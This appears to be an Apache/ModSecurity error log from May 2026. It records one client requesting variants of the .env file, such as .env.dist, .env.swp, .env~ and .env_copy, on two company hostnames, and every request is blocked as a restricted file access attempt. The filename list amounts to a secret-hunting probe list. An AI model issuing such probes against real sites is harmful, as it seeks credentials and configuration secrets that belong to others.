[Mon May 11 16:25:20.323922 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:40608] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.dist"] [unique_id "agHm0EWKUxpmnkK7zHx7gQAAAQY"]
[Mon May 11 16:25:20.326322 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:40608] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:20.326686 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:40608] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.dist"] [unique_id "agHm0EWKUxpmnkK7zHx7gQAAAQY"]
[Mon May 11 16:25:20.716412 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:40610] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.uat"] [unique_id "agHm0Py_GXSWIKeli0vx3QAAAI8"]
[Mon May 11 16:25:20.716643 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:40610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.uat"] [unique_id "agHm0Py_GXSWIKeli0vx3QAAAI8"]
[Mon May 11 16:25:20.717193 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:40610] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:20.717365 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:40610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.uat"] [unique_id "agHm0Py_GXSWIKeli0vx3QAAAI8"]
[Mon May 11 16:25:21.007614 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:40626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.swp"] [unique_id "agHm0TJnyuKVXoStDha0KwAAAFE"]
[Mon May 11 16:25:21.007845 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:40626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.swp"] [unique_id "agHm0TJnyuKVXoStDha0KwAAAFE"]
[Mon May 11 16:25:21.008347 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:40626] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:21.008513 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:40626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.swp"] [unique_id "agHm0TJnyuKVXoStDha0KwAAAFE"]
[Mon May 11 16:25:21.402605 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:40642] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.dist"] [unique_id "agHm0UWKUxpmnkK7zHx7ggAAAQk"]
[Mon May 11 16:25:21.403949 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:40642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.dist"] [unique_id "agHm0UWKUxpmnkK7zHx7ggAAAQk"]
[Mon May 11 16:25:21.404456 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:40642] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:21.404630 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:40642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.dist"] [unique_id "agHm0UWKUxpmnkK7zHx7ggAAAQk"]
[Mon May 11 16:25:21.728669 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:40644] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env~"] [unique_id "agHm0fy_GXSWIKeli0vx3gAAAIM"]
[Mon May 11 16:25:21.728907 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:40644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env~"] [unique_id "agHm0fy_GXSWIKeli0vx3gAAAIM"]
[Mon May 11 16:25:21.732126 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:40644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:21.733327 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:40644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env~"] [unique_id "agHm0fy_GXSWIKeli0vx3gAAAIM"]
[Mon May 11 16:25:22.081721 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:40656] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.swp"] [unique_id "agHm0lV4kyjgo4bQBUhT2QAAAME"]
[Mon May 11 16:25:22.081948 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:40656] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.swp"] [unique_id "agHm0lV4kyjgo4bQBUhT2QAAAME"]
[Mon May 11 16:25:22.082441 2026] [core:error] [pid 1416109:tid 1416131] [client 18.180.54.2:40656] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:22.082604 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:40656] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.swp"] [unique_id "agHm0lV4kyjgo4bQBUhT2QAAAME"]
[Mon May 11 16:25:22.436321 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:40670] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env1"] [unique_id "agHm0jJnyuKVXoStDha0LwAAAFM"]
[Mon May 11 16:25:22.436658 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:40670] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env1"] [unique_id "agHm0jJnyuKVXoStDha0LwAAAFM"]
[Mon May 11 16:25:22.437635 2026] [core:error] [pid 1412074:tid 1412095] [client 18.180.54.2:40670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:22.437866 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:40670] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env1"] [unique_id "agHm0jJnyuKVXoStDha0LwAAAFM"]
[Mon May 11 16:25:22.812807 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env~"] [unique_id "agHm0lV4kyjgo4bQBUhT4AAAAMI"]
[Mon May 11 16:25:22.813039 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env~"] [unique_id "agHm0lV4kyjgo4bQBUhT4AAAAMI"]
[Mon May 11 16:25:22.813582 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:40682] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:22.813739 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env~"] [unique_id "agHm0lV4kyjgo4bQBUhT4AAAAMI"]
[Mon May 11 16:25:23.153396 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:40690] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env2"] [unique_id "agHm0w-Qm4vhlWBPlMi5nAAAABg"]
[Mon May 11 16:25:23.153641 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:40690] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env2"] [unique_id "agHm0w-Qm4vhlWBPlMi5nAAAABg"]
[Mon May 11 16:25:23.154239 2026] [core:error] [pid 1411099:tid 1411124] [client 18.180.54.2:40690] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:23.154424 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:40690] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env2"] [unique_id "agHm0w-Qm4vhlWBPlMi5nAAAABg"]
[Mon May 11 16:25:23.557150 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:40694] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env1"] [unique_id "agHm0zJnyuKVXoStDha0OAAAAEc"]
[Mon May 11 16:25:23.557401 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:40694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env1"] [unique_id "agHm0zJnyuKVXoStDha0OAAAAEc"]
[Mon May 11 16:25:23.557920 2026] [core:error] [pid 1412074:tid 1412083] [client 18.180.54.2:40694] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:23.558869 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:40694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env1"] [unique_id "agHm0zJnyuKVXoStDha0OAAAAEc"]
[Mon May 11 16:25:23.889448 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40708] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env_copy"] [unique_id "agHm0_y_GXSWIKeli0vx6gAAAIw"]
[Mon May 11 16:25:23.889668 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40708] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env_copy"] [unique_id "agHm0_y_GXSWIKeli0vx6gAAAIw"]
[Mon May 11 16:25:23.890202 2026] [core:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40708] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:23.892430 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40708] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env_copy"] [unique_id "agHm0_y_GXSWIKeli0vx6gAAAIw"]
[Mon May 11 16:25:24.260573 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:40716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env2"] [unique_id "agHm1Py_GXSWIKeli0vx6wAAAJI"]
[Mon May 11 16:25:24.260811 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:40716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env2"] [unique_id "agHm1Py_GXSWIKeli0vx6wAAAJI"]
[Mon May 11 16:25:24.261365 2026] [core:error] [pid 1411201:tid 1411264] [client 18.180.54.2:40716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:24.262152 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:40716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env2"] [unique_id "agHm1Py_GXSWIKeli0vx6wAAAJI"]
